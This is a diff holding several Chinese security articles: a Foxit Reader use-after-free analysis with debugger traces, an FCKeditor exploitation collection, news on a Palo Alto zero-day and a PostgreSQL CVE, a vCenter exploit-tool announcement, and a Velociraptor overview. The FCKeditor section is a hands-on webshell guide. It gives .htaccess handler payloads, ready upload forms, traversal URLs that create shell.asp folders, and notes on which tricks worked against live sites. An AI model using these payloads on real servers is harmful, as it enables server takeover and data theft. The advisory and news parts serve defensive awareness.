  app.activeDocs[0].deletePages();
}
```
addField()函数执行后创建的易受攻击的缓冲区 ( )
0x18bbf0e0是
```
0:000> p
eax=18babf00 ebx=076fe0dc ecx=175db036 edx=00000001 esi=00000002 edi=16426750
eip=01b0fc8b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069db:
01b0fc8b 8bf8 mov edi,eax
0:000> dd eax
18babf00 0c8cb610 18bbf0e0 18bbf0b0 00000000
18babf10 00000000 00000000 00000000 00000000
18babf20 00000000 00000000 00000000 00000000
18babf30 00000000 00000000 00000000 00000000
18babf40 00000000 00000000 00000000 00000000
18babf50 00000000 00000000 00000000 00000000
18babf60 00000000 00000000 00000000 00000000
18babf70 00000000 00000000 00000000 00000000
0:000> dd 18bbf0e0 ;<----------------------------------- (3)
18bbf0e0 00000003 00000000 0c8cb610 18bbf0b0
18bbf0f0 00000000 18b92af8 00000001 00000001
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00000000 18bb7c08 18bb7c20 18bb7c38
18bbf120 18bb7c50 18bbe280 18bbe2a0 18bb7c68
18bbf130 18bbe2c0 18bb7c80 18ba1c78 18bbe2e0
18bbf140 18bb7c98 18bb7cb0 18bb7cc8 18bb7ce0
18bbf150 18bb7cf8 18bb7d10 18bb7d28 18bb7d40
```
deletePages()函数执行后,缓冲区按如下方式释放:(8)表示分配状态,(9)表示解除分配状态。
```
0:000> dd esi ;<----------- (8)
18bbf0e0 00000003 00000000 0c8cb610 1c789aa0
18bbf0f0 00000000 18b92af8 00000000 00000002
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3be edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24bf esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x37768f:
01ed24bf 83c404 add esp,4
0:000> dd esi ;<----------- (9)
18bbf0e0 00000000 00000000 0c8cb610 1c789aa0
18bbf0f0 00000000 18b92af8 00000000 00000002
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
```
复选框对象被释放,然后
bytestring由对象重新分配。
0x18bbf0e0您可以看到一个新对象被分配到相同的地址(),如下所示。
```
0:000> p
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b10022 esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d72:
01b10022 e849573d00 call FoxitPDFReader!safe_vsnprintf+0x38a940 (01ee5770)
0:000> dd ecx <------------------------ (10)
18bbf0e0 00000000 0000001f 0000001f 62626952
18bbf0f0 435f6e6f 67657461 5f79726f 74736f50
18bbf100 6e616353 6974704f 00736e6f 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
0:000> db ecx L28
18bbf0e0 00 00 00 00 1f 00 00 00-1f 00 00 00 52 69 62 62  ............Ribb
18bbf0f0 6f 6e 5f 43 61 74 65 67-6f 72 79 5f 50 6f 73 74  on_Category_Post
18bbf100 53 63 61 6e 4f 70 74 69
```
当复用 Checkbox 对象时,
0x18bbf0e0位于“缓冲区地址 ( ) + 0xc”的值 (
0x62626952)被传递给
this该对象此处为寄存器
esi最初复选框对象中的值是一个指针但当它被释放并
0x62626952接受一个值时就会发生访问冲突。
```
0:000> p
(21e8.21f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000008e0 ebx=00000000 ecx=00000066 edx=00000000 esi=62626962 edi=076fdcc4
eip=02124612 esp=076fdc7c ebp=076fdc84 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608 div eax,dword ptr [esi+8] ds:002b:6262696a=????????
```
取消分配复选框对象后攻击者bytestring可以分配一个对象从而可能允许读取和写入任意地址。这种可能性可能会导致远程代码执行。
**参考**
- https://nvd.nist.gov/vuln/detail/CVE-2024-28888
感谢您抽出
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "")
来阅读本文
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "")
**点它,分享点赞在看都在这里**

View File

@ -0,0 +1,518 @@
# Fckeditor编辑器漏洞汇集
原创 simeon的文章 小兵搞安全 2024-11-16 13:37
1.1Fckeditor简介
FCKeditor现在通常称为CKEditor是一个开源的、基于JavaScript的内容编辑器。它最初由Frederico Caldeira Knabben开发并于2003年首次发布。CKEditor旨在使Web开发者能够在其网站上添加富文本编辑功能用户无需具备HTML知识即可创建和编辑内容。
### 1.1.1主要特点
- **所见即所得 (WYSIWYG) 编辑**
CKEditor提供了一个可视化的编辑界面允许用户直接在页面上进行编辑效果与最终呈现出来的结果相同。
- **丰富的插件系统**
:支持通过插件扩展功能,如表格处理、图片上传、链接管理等。
- **跨浏览器兼容性**
支持所有主流浏览器包括Chrome, Firefox, Safari, Edge, 和 Internet Explorer。
- **高度可定制**
:界面、工具栏和功能都可以根据需要进行配置。
- **易于集成**
可以通过简单的API调用集成到各种Web应用程序中。
- **强大的API**
提供了一套完整的API方便开发者对编辑器进行深度定制。
- **开源**
采用GPL, LGPL 和 MPL三重许可模式既适合个人使用也适合商业项目。
### 1.1.2使用场景
CKEditor广泛应用于各种需要富文本输入的场合比如博客系统、CMS内容管理系统、论坛、在线文档编辑等。
### 1.1.3发展历程
随着技术的发展CKEditor经历了多次迭代更新每个版本都带来了性能优化、新特性和安全性改进。例如CKEditor 4 是一个成熟的版本,而 CKEditor 5 则引入了全新的架构,提供了更好的性能和更灵活的插件机制。
CKEditor 4下载地址
https://ckeditor.com/ckeditor-4/download/#ckeditor-4-lts
CKEditor 5下载地址
https://ckeditor.com/ckeditor-5/download/
Fckeditor下载地址
https://sourceforge.net/projects/fckeditor/files/
## 1.2Fckeditor历史漏洞
### 1.2.1FCKEditor Core ASP 2.6.8 任意文件上传保护绕过漏洞
FCKEditor 2.6.8 ASP 版本在处理重复文件时没有正确验证文件扩展名。这使得攻击者可以绕过文件上传保护,上传任何扩展名的文件,可能导致任意代码执行。
1.漏洞详情
易受攻击的文件: commands.asp
函数: FileUpload()
易受攻击的代码:
sFileName = RemoveExtension(sOriginalFileName) & "(" & iCounter & ")." & sExtension
2.利用方法
空字符绕过: 攻击者可以使用空字符 (\0) 绕过扩展名验证。
IIS6 模式: 运行在 IIS6 上的应用程序可以使用 file.asp;gif 模式上传恶意文件。
3.解决方案
为了缓解此漏洞,需要修改 config.asp 文件以强制执行严格的文件扩展名验证。找到 config.asp 文件,位于你的 FCKEditor 安装目录中。
找到以下行:
ConfigAllowedExtensions.Add "File", "Extensions Here"
将其替换为:
ConfigAllowedExtensions.Add "File", "^(Extensions Here)$"
漏洞详情参考链接地址:
https://www.exploit-db.com/exploits/23005
### 1.2.2FCKeditor 所有版本任意文件上传漏洞
1.漏洞简介
FCKeditor 所有版本存在任意文件上传漏洞,攻击者可以通过此漏洞上传任意文件(如 PHP 脚本),从而在服务器上执行任意代码。漏洞详情参考链接地址
https://www.exploit-db.com/exploits/17644
2.漏洞利用步骤
1创建一个 .htaccess 文件:
代码:
<FilesMatch "_php\.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2现在使用 FCKeditor 上传这个 .htaccess 文件。
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3现在使用 FCKeditor 上传 shell.php.gif。
上传 shell.php.gif 后,文件名会自动变为 shell_php.gif。
4现在可以从服务器访问 shell。
http://target.com/anything/shell_php.gif
### 1.2.3FCKEditor Core 2.x 2.4.3 - 'FileManager upload.php' 任意文件上传漏洞
1.漏洞概述
FCKEditor  2.x 版本(特别是 2.4.3 及之前的版本)存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 upload.php 脚本上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。
2.影响版本
FCKEditor 2.x <= 2.4.3
3.漏洞详情
在 FCKeditor/editor/filemanager/connectors/php/upload.php 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查:
1版本 2.0 - 2.2
在 upload.php 文件中Type 参数的值没有进行严格的验证,可以传递任意值。
如果传递的 Type 值不在 File, Flash, Image 之中,系统不会加载相应的扩展名过滤规则,从而允许上传任意文件。
3版本 2.3.0 - 2.4.3
虽然增加了对 Type 参数的验证,但 Media 类型的扩展名过滤规则在 config.php 中未定义。
因此,攻击者可以通过设置 Type=Media 来绕过文件类型检查,上传任意文件。
4.利用方法
以下是一个简单的 HTML 表单,用于演示如何利用此漏洞上传任意文件:
<form enctype="multipart/form-data" action="
http://example.com/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=Media"
method="post">
   <input name="NewFile" type="file">
   <input type="submit" value="提交">
</form>
### 1.2.4FCKEditor Core - 'FileManager test.html' 任意文件上传漏洞
1.漏洞简介
FCKEditor 存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 test.html 文件上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。
2.影响版本
FCKEditor 2.x 版本
3.漏洞详情
在 FCKeditor/editor/filemanager/connectors/test.html 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查:
任意文件上传:
test.html 文件中的上传功能没有严格验证文件类型和扩展名,允许上传任意文件。
攻击者可以上传一个带有恶意代码的文件(如 shell.php并在服务器上执行。
4.利用方法
以下是一个简单的 HTML 表单,用于演示如何利用此漏洞上传任意文件:
<form enctype="multipart/form-data" action="
http://example.com/FCKeditor/editor/filemanager/connectors/test.html?Command=QuickUpload&Type=File"
method="post">
   <input name="newfile" type="file">
   <input type="submit" value="提交">
</form>
### 1.2.5FCKEditor 2.0 <= 2.2 - 'FileManager connector.php' 任意文件上传漏洞
1.漏洞概述
FCKEditor 2.0 到 2.2 版本存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 connector.php 脚本上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。
2.影响版本
FCKEditor 2.0 <= 2.2
3.漏洞详情
在 FCKeditor/editor/filemanager/connectors/php/connector.php 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查:
任意文件上传:
connector.php 文件中的上传功能没有严格验证文件类型和扩展名,允许上传任意文件。
攻击者可以上传一个带有恶意代码的文件(如 shell.php并在服务器上执行。
利用脚本下载地址:
https://www.exploit-db.com/exploits/1484
## 1.3Fckeditor漏洞利用小结
### 1.3.1FCKeditor重要信息收集
1
FCKeditor
编辑器页
FCKeditor/_samples/default.html
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicu93ZnTHulUp68YUMzTAdRFYcPblA2T46O89ylAcNUw5GCnjjtrCZWw/640?wx_fmt=png&from=appmsg "")
2
)查看编辑器版本
FCKeditor/editor/dialog/fck_about.html
FCKeditor/_whatsnew.html
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSictBcgRwibFatWHBPHbkFrVQArnc02Rw7zKTsbWR6Fbk4TJFlwt5krRtQ/640?wx_fmt=png&from=appmsg "")
3查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicOdk931MOVwGKFx1RaGsQqicsBBsuMmib1r2ZWfBLFEgNRkicdu0Lfo6nA/640?wx_fmt=png&from=appmsg "")
4.FCKeditor被动限制策略所导致的过滤不严问题
小于等于
FCKeditor v2.4.3
版本中
File
类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2
允许上传
asa
cer
php2
php4
inc
pwml
pht
后缀的文件
上传后它保存的文件直接用的
$sFilePath = $sServerDir . $sFileName
,而没有使用
$sExtension
为后缀,直接导致在
win
下在上传文件后面加个
.
来突破。
5.利用2003路径解析漏洞上传网马
利用
2003
系统路径解析漏洞的原理,创建类似“
1.asp
”目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
6.FCKeditor PHP上传任意文件漏洞
影响版本
: FCKeditor 2.2 <= FCKeditor 2.4.2
FCKeditor
在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。在通过
editor/filemanager/upload/php/upload.php
上传文件时攻击者可以通过为
Type
参数定义无效的值导致上传任意脚本。成功攻击要求
config.php
配置文件中启用文件上传,而默认是禁用的。
将一下代码保存为
html
文件,并修改
action
后的地址为网站实际地址。
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head><body><form id="frmUpload" enctype="multipart/form-data" action="http://www.test.com/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form></body></html>
7.TYPE自定义变量任意上传文件漏洞
通过自定义
Type
变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSic6feMIBfd4OQNSib3c2wRfzLakQZklYT97tVicXKicGSpR1XibxzQgEW6XQ/640?wx_fmt=png&from=appmsg "")
注意出现这个需要登录后台后再上传。
打开这个地址就可以上传任何类型的文件了,
Shell
上传到的默认位置是
:
http://www.URL.com/UserFiles/all/1.asp
"Type=all"
这个变量是自定义的,在这里创建了
all
这个目录,而且新的目录没有上传文件格式的限制。比如输入
:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
网马就可以传到网站的根目录下。
8.aspx版FCKeditor 新闻组件遍历目录漏洞
修改
CurrentFolder
参数使用
../../
来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根据返回的
XML
信息可以查看网站所有的目录。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
9FCKeditor中test上传方式及sample上传
如果存在以下文件,打开后即可上传文件。
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicZWLsJic0V5f7xKq6rOXTlVxQWKVASmvvlzh4InH6Tuohwz2KI9oa6UQ/640?wx_fmt=png&from=appmsg "")
sample上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
10.FCKeditor 文件上传“.”变“_”下划线的绕过方法
上传的文件例如:
shell.php.rar
shell.php;.jpg
会变为
shell_php;.jpg
这是新版
FCK
的变化。
提交
1.php+
空格就可以绕过去所有的,不过空格只支持
win
系统
linux
是不支持的(
1.php
1.php+
空格是
2
个不同的文件)
11“.htaccess”文件图片上传。
通过一个
.htaccess
文件调用
php
的解析器去解析一个文件名中只要包含
"haha"
这个字符串的任意文件,所以无论文件名是什么样子,只要包含
"haha"
这个字符串,都可以被以
php
的方式来解析,是不是相当邪恶,一个自定义的
.htaccess
文件就可以以各种各样的方式去绕过很多上传验证机制,建一个
.htaccess
文件,里面的内容如下:
<FilesMatch "haha">
SetHandler application/x-httpd-php
</FilesMatch>
通过Fckeditor将其上传然后再上传一个包含haha名称的木马文件即可获取webshell。也可以将其修改为jpg然后上传一个图片木马即可获取webshell。
12 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
访问后会创建一个shell.asp及z的文件夹。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicgZs4trsyGuTXVYD3uFzBWdibicOPAO7wy0XreV1xeSMsibTJLQeG7hHnQ/640?wx_fmt=png&from=appmsg "")
http://www.xxxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.xxxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
然后可以对image文件夹进行浏览及上传
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSic1lklvlRAQU5rCUIMv4mvaubIVAbhUjxuJ96pibk9FjoroQEdib5A0DQw/640?wx_fmt=png&from=appmsg "")
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
13常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/Fconnector.asp
(ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
13列目录漏洞也可助找上传地址
修改CurrentFolder 参数使用 ../../来进入不同的目录Version 2.4.1 测试通过
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
14FCK编辑器jsp版本漏洞
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
上传马所在目录
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
## 1.3资产收集系统利用
FCKeditor/_samples/default.html
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSiczZ3GiczX7eMmvT1YUr8oa69qD21mzgbicjGBO01m4WVJIUkHcs6pePsA/640?wx_fmt=png&from=appmsg "")
url_load:"/FCKeditor/"

View File

@ -0,0 +1,68 @@
# Palo Alto Networks 确认存在新的防火墙0day漏洞
会杀毒的单反狗 军哥网络安全读报 2024-11-16 01:02
**导****读**
在告知客户正在调查有关新的防火墙远程代码执行漏洞后Palo Alto Networks 于周五证实,一种新的
0day
漏洞正被用于攻击。
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaFvIoENTT3CXNzouetA72jp6X8WSVDxxGBelDNy0E0Kew8tRQcWMkjINuaaQccfcfjgvBBs0zGatg/640?wx_fmt=jpeg&from=appmsg "")
Palo Alto Networks于 11 月 8 日发布了一份公告(
https://security.paloaltonetworks.com/PAN-SA-2024-0015
),针对有关远程代码执行漏洞的说法,敦促客户确保对 PAN-OS
管理界面的访问是安全的。
Palo Alto Networks 最初表示,尚未发现任何
0day
漏洞被利用的迹象,但在周五,该公司更新了公告,称“已观察到利用未经身份验证的远程命令执行漏洞针对有限数量暴露在互联网上的防火墙管理接口的威胁活动”。
目前还不清楚该漏洞是如何暴露的、谁利用了它、以及攻击的目标是谁。
该漏洞尚未分配
CVE 标识符,但其 CVSS 评分为 9.3,属于“严重级别”。
Palo Alto
告诉客户,它正在开发补丁和威胁预防签名,希望很快发布。
Palo Alto 
建议客户确保只能从受信任的
IP 地址访问防火墙管理界面,而不能从互联网访问。
Palo Alto
Networks 表示:“绝大多数防火墙已经遵循 Palo Alto Networks 和行业最佳实践。”
该安全公司指出,“如果管理界面访问仅限于
IP则利用的风险将大大限制因为任何潜在攻击都首先需要对这些 IP 的特权访问。”
该公司认为
Prisma Access 和 Cloud NGFW 产品不受影响。
这并不是最近几天曝光的唯一一个
Palo Alto 产品漏洞。美国网络安全机构 CISA 表示,它已经发现有三个影响 Palo Alto Networks Expedition
的漏洞已被利用。
**新闻链接:**
https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "")
扫码关注
军哥网络安全读报
**讲述普通人能听懂的安全故事**

View File

@ -0,0 +1,41 @@
# PostgreSQL数据库存在高危漏洞CVE-2024-109798.8
独眼情报 2024-11-16 08:41
![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnSo421EKic7n1NqR2Illia2B9h75PyrmmZBlqXO3mgIxNFSjgCWjKictRUsHuWZwib2MOwbQ6gn6pEjSw/640?wx_fmt=png&from=appmsg "")
PostgreSQL发现严重安全漏洞可能导致数据泄露和系统被入侵
![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnSo421EKic7n1NqR2Illia2B98ggnlExZODzwFuxQd1bl9xcibpfDcdd0KmV79MoDTAfoHGneicaa2qmA/640?wx_fmt=png&from=appmsg "")
Varonis安全研究团队的Tal Peleg和Coby Abrams发现了一个影响广泛使用的开源数据库系统PostgreSQL的高危漏洞。该漏洞被编号为CVE-2024-10979可能会威胁到全球众多数据库的安全。
根据Varonis周五发布的研究报告这个漏洞在CVSS评分系统中达到了8.8分的高危等级。值得注意的是所有低于17.1、16.5、15.9、14.14、13.17和12.21版本的PostgreSQL都存在这一漏洞。
这个漏洞允许普通用户在PostgreSQL的PL/Perl扩展中操纵环境变量。需要说明的是PL/Perl扩展是一个允许用户使用Perl语言编写数据库函数的工具。攻击者可以利用这个漏洞来操控运行数据库服务器上的环境变量。
PostgreSQL在其安全公告(https://www.postgresql.org/support/security/CVE-2024-10979/)中解释道:"PostgreSQL PL/Perl(https://www.postgresql.org/docs/current/plperl.html)中对环境变量的控制存在缺陷使得普通数据库用户可以修改敏感的进程环境变量如PATH。即使攻击者没有数据库服务器操作系统用户权限这种漏洞也足以让他们执行任意代码。"
环境变量就像是控制程序运行的隐藏开关。攻击者通过修改这些变量,可能会执行恶意代码,最终窃取数据或控制整个系统。
更严重的是,环境变量有时会包含访问密钥或文件路径等敏感信息。攻击者可能会通过操纵这些变量来窃取数据库服务器中的重要信息。
要修复这个漏洞建议立即将PostgreSQL更新到以下版本之一17.1、16.5、15.9、14.14、13.17或12.21。这些更新版本已经修复了这个安全漏洞。
Varonis建议用户采取以下防护措施
1. 更新PostgreSQL至最新小版本
1. 严格限制允许使用的扩展
1. 只向特定扩展授予CREATE EXTENSIONS权限
1. 将shared_preload_libraries配置参数设置为仅加载必需的库
完整的修复方案可以在这里(https://github.com/postgres/postgres/commit/b7e3a52a877cffb42ec7208232e30a8e44231e01)查看。
此外,建议限制用户安装数据库扩展的权限,防止攻击者利用漏洞,同时遵循最小权限原则,以降低可能造成的损失。
>
> https://www.varonis.com/blog/cve-postgresql-pl/perl

View File

@ -0,0 +1,60 @@
# Vcenter图形化漏洞利用工具
黑白之道 2024-11-16 01:01
![](https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif "")
**1**►
**工具介绍**
当前支持以下漏洞的检测,利用、命令执行还没写内容
CVE-2021-22005
CVE-2021-21972
CVE-2021-21985
年初学习java时写了一个带命令执行和上传文件的一直没什么机会用本来不打算继续写的。
结果前段时间公司内部搞红蓝,还碰到了不少低版本的,命令行的有时候又很麻烦,还是喜欢无脑点点点的。
电脑上东西太多了,之前的好几个版本的源码懒得看哪个最新的,于是打算重新写一个,扔到这,随时能改。
预留了一些接口后面每天抽空更新一些。如果有人想写可以拿走自己写记得点个star!!!
**2**►
**工具展示**
**环境**
jdk >= 11.0.1
![](https://mmbiz.qpic.cn/mmbiz_png/XoIcX2HtlUAszm8GeweuGRcKcbjJibicYL1C6HoTaicAXy3blEzbjrAKV2C4KydCkx7fvT7LicWlX83ydk8RQppXOg/640?wx_fmt=png&from=appmsg&wxfrom=13&tp=wxpic "")
**3**►
**工具获取**
https://github.com/zidanfanshao/vcenter_tools
> **文章来源:李白你好**
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
**END**

View File

@ -0,0 +1,192 @@
# Velociraptor一款终端节点可视化与数据收集工具
Alpha_h4ck FreeBuf 2024-11-16 02:02
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
**关于Velociraptor**
## Velociraptor是一款终端节点可视化与数据收集工具该工具使用了Velociraptor 查询语言 (VQL) ,可以帮助广大研究人员查询收集基于主机的状态信息。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gHUcRCfDxzZDLibicibpsosbSSwAV3kXSDUwztKSfiadHMIKqvmGUlXEibA/640?wx_fmt=jpeg&from=appmsg "")
##
**功能介绍**
Velociraptor 是一个独特、先进的开源端点监控、数字取证和网络响应平台。当前版本的Velociraptor具备以下功能特点
> 1、能够有效应对数据泄露
> 2、通过数字取证分析重建威胁行为者的活动
> 3、寻找威胁行为者的活动证据
> 4、调查恶意软件爆发和其他可疑网络活动
> 5、持续监控可疑的用户活动例如将文件复制到 USB 设备;
> 6、网络外机密信息泄露
> 7、随着时间的推移收集端点数据以用于威胁搜寻和未来调查
##
**工具特点**
##
> 1、有用 ——每个工件和用例都必须向用户返回有价值的信息
> 2、简单 ——设计和界面必须易于浏览和使用
> 3、指导性 ——用户不需要是 DFIR 专家,因为所有元素都应提供信息描述和指导
